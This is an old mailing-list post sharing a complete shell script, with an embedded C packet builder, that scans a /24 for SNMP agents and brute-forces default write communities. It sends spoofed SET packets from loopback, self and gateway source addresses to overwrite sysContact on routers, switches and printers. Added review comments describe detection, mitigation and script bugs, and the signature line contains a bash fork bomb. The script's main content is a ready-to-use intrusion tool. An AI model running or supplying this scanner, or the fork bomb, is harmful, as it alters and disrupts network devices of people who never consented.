Hmm, to keep you busy, here's a brute-force spoofing scanner for writable
SNMP communities. It requires NetCat and the SNMP tools (like snmpget) to be
installed. Scanning is mostly harmless - it tries to change
system.sysContact.0 to 'null' using common default communities (according
to securityfocus). It should be run as root.

In addition to the list of machines given in the initial post, it is known to
break some Cisco systems (but not recent IOSes, at least not in the default
configuration), most 3Com products (there was another writable
community, which seems to be present everywhere, regardless of 'private',
which is sometimes disabled by administrators), HP switches, printers,
Ascend *DSL modems etc. Also, it should bypass most of the stupid source IP
address restrictions for accessing the community.

Please use this tool to scan your network only.

_______________________________________________________
Michal Zalewski * [[EMAIL PROTECTED]] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
#!/bin/sh
# Scans one /24 for SNMP agents that answer a read with the 'public'
# community, then tries a list of default community strings as WRITE
# communities by attempting to set system.sysContact.0 to 'null' and reading
# it back.  Results are appended to ./WYSZLO in the current directory.
#
# Review notes for operators of scanned devices: a sysContact value of 'null'
# is the artefact this leaves behind, and SNMP SET traffic to UDP/161 arriving
# with a loopback, self, or gateway source address (see the nc -s lines below)
# is an obvious detection signal.  Mitigation is the usual set: no default or
# write communities, SNMPv3 with authentication, and ingress anti-spoofing
# filters so packets claiming a local source cannot come from outside.
#
# NOTE(review): the shebang says /bin/sh but the body uses bash-only syntax
# (`&>` redirection, `let`); under a strict POSIX sh `&>` is parsed as `&`
# (background) followed by `>`, which changes behaviour.  Run it with bash.

# Remove leftovers from a previous run (work files in the cwd, the helper
# binary/source in /tmp, and the output file).
rm -f .walk.tmp* /tmp/spoof-* WYSZLO &>/dev/null

echo "snmpd vulnerability scanner by <[EMAIL PROTECTED]>"
echo

# $1: last octet to start scanning from.  $2: the /24 prefix, three octets
# without a trailing dot (e.g. 172.16.1).
x=$1
PRE=$2

# Only $2 is validated.  A missing or non-numeric $1 is not caught here and
# surfaces later in the `[ "$x" -lt "256" ]` test.
if [ "$2" = "" ]; then
  echo "Usage: $0 start_at c_subnet"
  echo "example: '$0 0 172.16.1' will scan 172.16.1.0-255."
  echo
  exit 
fi

# Predictable path under /tmp ($$ is the shell's PID).  The source is written
# with `cat >`, compiled with `gcc -o`, and the result executed below; the
# author recommends running as root, so a pre-existing symlink or file at
# /tmp/spoof-<pid> or /tmp/spoof-<pid>.c planted by another local user is a
# write-through and code-execution hazard for the person running the script.
SPFILE="/tmp/spoof-$$"

# Heredoc below is program data written to $SPFILE.c and is left byte-for-byte
# as the author wrote it.  The helper writes, to stdout, the request that
# attempts to set sysContact.0 to "null" for the community given in argv[1];
# that output is piped into nc further down.
cat >$SPFILE.c <<_EOF_
char buf[1000];
char part1[]="0\202\0-\2\1\0\4";
char part2[]="\243\37\2\1\1\2\1\0\2\1\0000\0240\202\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main(int argc,char**argv) {
  char x=strlen(argv[1]);
  memcpy(buf,part1,sizeof(part1)-1);
  memcpy(buf+sizeof(part1)-1,&x,1);
  strcpy(buf+sizeof(part1),argv[1]);
  memcpy(buf+sizeof(part1)+x,part2,sizeof(part2)-1);
  write(1,buf,x+1+sizeof(part1)+sizeof(part2));
}
_EOF_

echo "Compiling helper application..."

# Compiler diagnostics go straight to the terminal; the only success check is
# that an executable appeared at $SPFILE.
gcc -o $SPFILE $SPFILE.c

test -x $SPFILE || exit

echo "Scan range: $PRE.$x-255..."

# When the scan starts at .0, first seed the target list with the intermediate
# hops traceroute -n reports on the way to $PRE.32 (second column of its
# output).  `killall traceroute` is not scoped to this script: it kills every
# traceroute process on the host.
if [ "$1" = "0" ]; then
  echo "* Collecting routing information (6 seconds)..."
  /usr/sbin/traceroute -n -f 3 -w 60 $PRE.32 2>/dev/null >.walk.tmp &
  sleep 6 
  killall traceroute &>/dev/null
  awk '{print $2}' .walk.tmp >.walk.tmp2
fi

echo "Starting scan. Outfile is: WYSZLO"

# Append $PRE.$x .. $PRE.255 to the target list.  .walk.tmp2 is appended to,
# so any traceroute hops collected above stay at the front.
while [ "$x" -lt "256" ]; do
  echo $PRE.$x >>.walk.tmp2
  let x=x+1
done

# Whitespace-separated list of community strings tried, in this order, for
# each responding target.  Two more two-word entries and the first word of the
# target's sysDescr are appended per target in the inner `for` below.
COMMUNITIES="public private write all monitor agent manager OrigEquipMfr admin default 
password tivoli openview community snmp snmpd system"

# Per target: confirm it answers a read with 'public', then try each
# community as a write.  .walk.tmp2 is overwritten inside the loop, but the
# `for` has already expanded `cat`'s output, so iteration is unaffected.
for i in `cat .walk.tmp2`; do
  echo -n "$i: "
  # Reachability probe.  The target counts as "OK" only if none of the listed
  # error words appear anywhere in snmpget's combined stdout+stderr.
  snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
  ERR="`grep -c -iE 'refuse|error|timeout|fail|denied|found|acce' .walk.tmp`"
  if [ "$ERR" = "0" ]; then
    echo "OK"
    echo -n "  system: "
    # Text between the first pair of double quotes, i.e. the sysDescr value.
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    SYS="`cat .walk.tmp2`"
    echo "$SYS"
    # This second query is again sysDescr.0 (not sysName.0), so SYSNAME ends
    # up being the first word of the description string.
    snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    SYSNAME="`awk '{print $1}' .walk.tmp2`"
     echo "$i ($SYS):" >>WYSZLO
     # $COMMUNITIES is deliberately unquoted so it word-splits into one
     # candidate per word; the two quoted entries stay single items.  $SYSNAME
     # is unquoted as well and may expand to nothing.
     for j in $COMMUNITIES 'all private' 'Secret C0de' $SYSNAME; do
      echo -n "  $j> "
      # The same datagram is sent four times in the background, differing only
      # in the source address nc binds with -s: the real one, loopback, the
      # target's own address, and $PRE.1.
      $SPFILE "$j" | nc -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s 127.0.0.1 -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $i -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $PRE.1 -u $i 161 &>/dev/null &
      # nc in UDP mode presumably keeps waiting for replies, so after one
      # second every nc process on the host is killed -- not only these four.
      sleep 1
      killall nc &>/dev/null
      # Success test: read sysContact.0 back and count lines containing
      # "null".  A device whose contact string already contained "null" would
      # be reported as WORKED for the first community tried.
      snmpget -R 2 $i public system.sysContact.0 &>.walk.tmp
      WORKED="`grep -c null .walk.tmp 2>/dev/null`"
      if [ "$WORKED" = "0" ]; then
        echo "  - $j failed." >>WYSZLO
        echo "failed."
      else
        echo "OK"
        echo "  - $j WORKED." >>WYSZLO
        # Stop at the first community that worked for this target.
        break
      fi
    done
  else
    # Polish: "silent..." -- the read probe got no usable reply.
    echo "milczy..."
  fi
done

echo "Done."
# Work files and the helper source/binary are removed; WYSZLO is kept.
rm -f .walk.tmp* $SPFILE*
 
